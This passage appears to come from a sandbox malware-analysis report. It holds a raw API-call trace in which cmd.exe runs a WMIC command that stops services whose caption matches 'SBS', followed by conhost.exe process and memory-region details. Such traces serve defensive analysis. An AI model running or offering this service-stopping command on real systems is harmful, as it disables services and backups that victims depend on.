out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.496] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.496] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0112.496] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0112.496] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0112.496] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0112.496] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0112.496] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0112.496] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0112.496] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0112.496] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x459fc50 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0112.496] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x459fc50, lpFilePart=0x459fc48 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x459fc48*="Desktop") returned 0x1d [0112.496] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0112.497] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x459f9d0 | out: lpFindFileData=0x459f9d0) returned 0x48a05c8 [0112.497] FindClose (in: hFindFile=0x48a05c8 | out: hFindFile=0x48a05c8) returned 1 [0112.497] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x459f9d0 | out: lpFindFileData=0x459f9d0) returned 0x48a05c8 [0112.497] FindClose (in: hFindFile=0x48a05c8 | out: hFindFile=0x48a05c8) returned 1 [0112.497] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0112.497] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x459f9d0 | out: lpFindFileData=0x459f9d0) returned 0x48a05c8 [0112.497] FindClose (in: hFindFile=0x48a05c8 | out: hFindFile=0x48a05c8) returned 1 [0112.497] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0112.497] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0112.497] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0112.497] GetEnvironmentStringsW () returned 0x48a7dc8* [0112.497] FreeEnvironmentStringsA (penv="=") returned 1 [0112.497] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0112.498] GetConsoleOutputCP () returned 0x1b5 [0112.498] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0112.498] GetUserDefaultLCID () returned 0x409 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x459fd80, cchData=128 | out: lpLCData="0") returned 2 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x459fd80, cchData=128 | out: lpLCData="0") returned 2 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x459fd80, cchData=128 | out: lpLCData="1") returned 2 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0112.498] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0112.498] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0112.499] GetConsoleTitleW (in: lpConsoleTitle=0x48aaa90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.499] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0112.499] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0112.499] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0112.499] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0112.500] GetEnvironmentVariableW (in: lpName="SBS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.500] _wcsicmp (_String1="SBS", _String2="CD") returned 16 [0112.500] _wcsicmp (_String1="SBS", _String2="ERRORLEVEL") returned 14 [0112.500] _wcsicmp (_String1="SBS", _String2="CMDEXTVERSION") returned 16 [0112.500] _wcsicmp (_String1="SBS", _String2="CMDCMDLINE") returned 16 [0112.500] _wcsicmp (_String1="SBS", _String2="DATE") returned 15 [0112.500] _wcsicmp (_String1="SBS", _String2="TIME") returned -1 [0112.500] _wcsicmp (_String1="SBS", _String2="RANDOM") returned 1 [0112.500] _wcsicmp (_String1="SBS", _String2="HIGHESTNUMANODENUMBER") returned 11 [0112.500] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0112.500] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0112.500] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0112.500] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0112.500] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0112.500] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0112.500] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0112.501] GetConsoleTitleW (in: lpConsoleTitle=0x459fa68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.502] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0112.502] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0112.502] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0112.502] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0112.502] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0112.502] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0112.502] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0112.502] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0112.502] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0112.502] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0112.502] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0112.502] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0112.502] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0112.502] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0112.502] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0112.502] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0112.502] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0112.502] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0112.502] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0112.502] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0112.502] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0112.502] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0112.502] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0112.502] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0112.502] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0112.502] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0112.502] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0112.502] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0112.502] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0112.502] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0112.502] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0112.502] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0112.502] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0112.502] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0112.502] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0112.503] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0112.503] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0112.503] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0112.503] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0112.503] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0112.503] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0112.503] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0112.503] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0112.503] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0112.503] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0112.503] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0112.503] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0112.503] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0112.503] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0112.503] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0112.503] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0112.503] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0112.503] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0112.503] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0112.503] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0112.503] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0112.503] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0112.503] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0112.503] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0112.503] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0112.503] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0112.503] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0112.503] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0112.503] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0112.503] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0112.503] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0112.503] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0112.503] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0112.503] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0112.503] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0112.503] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0112.503] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0112.503] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0112.503] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0112.503] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0112.503] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0112.503] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0112.503] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0112.503] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0112.503] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0112.503] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0112.503] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0112.503] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0112.503] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0112.503] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0112.503] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0112.503] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0112.504] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0112.504] SetErrorMode (uMode=0x0) returned 0x0 [0112.504] SetErrorMode (uMode=0x1) returned 0x0 [0112.504] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x48a05d0, lpFilePart=0x459f574 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x459f574*="Desktop") returned 0x1d [0112.504] SetErrorMode (uMode=0x0) returned 0x1 [0112.504] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0112.504] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0112.509] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0112.510] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.510] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x459f300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459f300) returned 0xffffffff [0112.510] GetLastError () returned 0x2 [0112.510] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.510] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x459f300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459f300) returned 0xffffffff [0112.510] GetLastError () returned 0x2 [0112.510] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.510] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x459f300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459f300) returned 0xffffffff [0112.511] GetLastError () returned 0x2 [0112.511] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.511] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x459f300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459f300) returned 0xffffffff [0112.511] GetLastError () returned 0x2 [0112.511] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.511] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x459f300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459f300) returned 0x48ab390 [0112.511] FindClose (in: hFindFile=0x48ab390 | out: hFindFile=0x48ab390) returned 1 [0112.511] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x459f300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459f300) returned 0xffffffff [0112.511] GetLastError () returned 0x2 [0112.511] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x459f300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x459f300) returned 0x48ab390 [0112.511] FindClose (in: hFindFile=0x48ab390 | out: hFindFile=0x48ab390) returned 1 [0112.511] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0112.511] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0112.511] GetConsoleTitleW (in: lpConsoleTitle=0x459f7f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.512] InitializeProcThreadAttributeList (in: lpAttributeList=0x459f720, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x459f704 | out: lpAttributeList=0x459f720, lpSize=0x459f704) returned 1 [0112.512] UpdateProcThreadAttribute (in: lpAttributeList=0x459f720, dwFlags=0x0, Attribute=0x60001, lpValue=0x459f70c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x459f720, lpPreviousValue=0x0) returned 1 [0112.512] GetStartupInfoW (in: lpStartupInfo=0x459f758 | out: lpStartupInfo=0x459f758*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0112.512] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0112.513] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0112.513] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0112.513] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0112.513] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0112.513] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0112.513] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0112.513] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0112.513] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0112.514] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x459f6a8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x459f6f4 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE", lpProcessInformation=0x459f6f4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe88, dwThreadId=0xe8c)) returned 1 [0112.521] CloseHandle (hObject=0xa4) returned 1 [0112.521] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0112.521] GetEnvironmentStringsW () returned 0x48a9f30* [0112.521] FreeEnvironmentStringsA (penv="=") returned 1 [0112.521] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0113.351] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x459f68c | out: lpExitCode=0x459f68c*=0x0) returned 1 [0113.351] CloseHandle (hObject=0xa8) returned 1 [0113.351] _vsnwprintf (in: _Buffer=0x459f774, _BufferCount=0x13, _Format="%08X", _ArgList=0x459f694 | out: _Buffer="00000000") returned 8 [0113.352] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0113.352] GetEnvironmentStringsW () returned 0x48ab390* [0113.352] FreeEnvironmentStringsA (penv="=") returned 1 [0113.352] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0113.352] GetEnvironmentStringsW () returned 0x48ab390* [0113.352] FreeEnvironmentStringsA (penv="=") returned 1 [0113.352] DeleteProcThreadAttributeList (in: lpAttributeList=0x459f720 | out: lpAttributeList=0x459f720) [0113.352] _get_osfhandle (_FileHandle=1) returned 0x3c [0113.352] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0113.352] _get_osfhandle (_FileHandle=1) returned 0x3c [0113.352] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0113.353] _get_osfhandle (_FileHandle=0) returned 0x38 [0113.353] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0113.353] SetConsoleInputExeNameW () returned 0x1 [0113.353] GetConsoleOutputCP () returned 0x1b5 [0113.353] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0113.353] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.353] exit (_Code=0) Thread: id = 229 os_tid = 0xe84 Process: id = "47" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x45820000" os_pid = "0xe74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0xe6c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3067 start_va = 0x7f1f0000 end_va = 0x7f1f0fff entry_point = 0x0 region_type = private name = "private_0x000000007f1f0000" filename = "" Region: id = 3068 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3069 start_va = 0x9b45860000 end_va = 0x9b4587ffff entry_point = 0x0 region_type = private name = "private_0x0000009b45860000" filename = "" Region: id = 3070 start_va = 0x9b45880000 end_va = 0x9b45893fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b45880000" filename = "" Region: id = 3071 start_va = 0x9b458a0000 end_va = 0x9b458dffff entry_point = 0x0 region_type = private name = "private_0x0000009b458a0000" filename = "" Region: id = 3072 start_va = 0x7df5ff900000 end_va = 0x7ff5ff8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff900000" filename = "" Region: id = 3073 start_va = 0x7ff6c41d0000 end_va = 0x7ff6c41f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c41d0000" filename = "" Region: id = 3074 start_va = 0x7ff6c41f8000 end_va = 0x7ff6c41f8fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41f8000" filename = "" Region: id = 3075 start_va = 0x7ff6c41fe000 end_va = 0x7ff6c41fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41fe000" filename = "" Region: id = 3076 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 3077 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3078 start_va = 0x9b45a30000 end_va = 0x9b45b2ffff entry_point = 0x0 region_type = private name = "private_0x0000009b45a30000" filename = "" Region: id = 3079 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3080 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 